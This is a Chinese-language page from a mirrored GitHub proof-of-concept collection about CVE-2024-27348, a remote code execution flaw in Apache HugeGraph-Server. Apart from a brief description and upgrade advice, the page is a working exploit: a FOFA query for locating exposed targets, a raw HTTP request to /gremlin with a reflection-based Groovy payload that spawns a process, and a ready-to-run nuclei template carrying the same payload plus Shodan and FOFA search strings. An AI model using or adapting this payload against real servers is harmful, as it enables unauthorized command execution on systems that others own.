admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Apache/Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

69 lines
3.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348)
Apache HugeGraph-Server 中的 RCE-远程命令执行漏洞。此问题影响 Apache HugeGraph-ServerJava8 和 Java11 中 1.3.0 之前的 1.0.0 建议用户升级到 Java11 版本 1.3.0 并启用身份验证系统,这解决了这个问题。
## fofa
```
app="HugeGraph-Studio"
```
## poc
```
POST /gremlin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
```
## nuclei
```
id: CVE-2024-27348
info:
name: Apache HugeGraph-Server - Remote Command Execution
author: DhiyaneshDK
severity: high
description: |
Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
reference:
- http://www.openwall.com/lists/oss-security/2024/04/22/3
- https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
- https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
- https://github.com/Zeyad-Azima/CVE-2024-27348
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
- https://nvd.nist.gov/vuln/detail/CVE-2024-27348
classification:
cve-id: CVE-2024-27348
cwe-id: CWE-77
epss-score: 0.00045
epss-percentile: 0.15047
metadata:
verified: true
max-request: 1
shodan-query: title:"HugeGraph"
fofa-query: title="HugeGraph"
tags: cve,cve2024,hugegraph,rce,apache
http:
- raw:
- |
POST /gremlin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(header, "application/json")'
- 'contains(body, "inputStream\":")'
condition: and
```
Reference in New Issue View Git Blame Copy Permalink